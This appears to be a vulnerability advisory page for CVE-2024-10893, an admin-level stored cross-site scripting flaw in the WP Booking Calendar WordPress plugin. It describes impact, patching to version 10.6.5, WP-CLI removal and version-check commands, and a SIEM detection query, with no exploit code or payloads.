CVE-2024-10893
📋 TL;DR
This vulnerability in the WP Booking Calendar WordPress plugin allows administrators to inject malicious scripts into plugin settings, which then execute when other users view those settings. It affects WordPress sites using vulnerable plugin versions, particularly in multisite configurations where unfiltered_html is restricted.
💻 Affected Systems
- WP Booking Calendar WordPress Plugin
📦 What is this software?
Wp Booking Calendar by Wpbookingcalendar
⚠️ Risk & Real-World Impact
Worst Case
Administrator account compromise leading to site takeover, credential theft from users, or malware distribution to visitors.
Likely Case
Privileged admin users could inject malicious JavaScript that steals session cookies or redirects users to phishing sites.
If Mitigated
With proper user access controls and content security policies, impact is limited to potential data leakage from users viewing admin pages.
🎯 Exploit Status
Exploitation requires admin-level access. Attack would involve injecting malicious JavaScript into plugin settings fields.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.6.5
Vendor Advisory: https://wpscan.com/vulnerability/a230a552-3fda-4145-810f-58af540107db/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find WP Booking Calendar. 4. Click 'Update Now' if update available. 5. If manual update needed, download version 10.6.5+ from WordPress.org and replace plugin files.
🔧 Temporary Workarounds
Remove vulnerable plugin
allTemporarily disable or remove the WP Booking Calendar plugin until patched
wp plugin deactivate wp-booking-calendar
wp plugin delete wp-booking-calendar
Restrict admin access
allLimit administrative access to trusted users only and monitor admin activity
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to prevent script execution
- Use web application firewall rules to block XSS payloads in plugin settings
🔍 How to Verify
Check if Vulnerable:
Check plugin version in WordPress admin under Plugins > Installed Plugins. Look for WP Booking Calendar version number.Check Version:
wp plugin get wp-booking-calendar --field=versionVerify Fix Applied:
Confirm plugin version is 10.6.5 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual admin user activity modifying plugin settings
- JavaScript payloads in plugin option updates
Network Indicators:
- Suspicious outbound connections from admin pages
- Unexpected script loads from plugin settings pages
SIEM Query:
source="wordpress" AND (event="plugin_updated" OR event="option_updated") AND plugin="wp-booking-calendar" AND version<"10.6.5"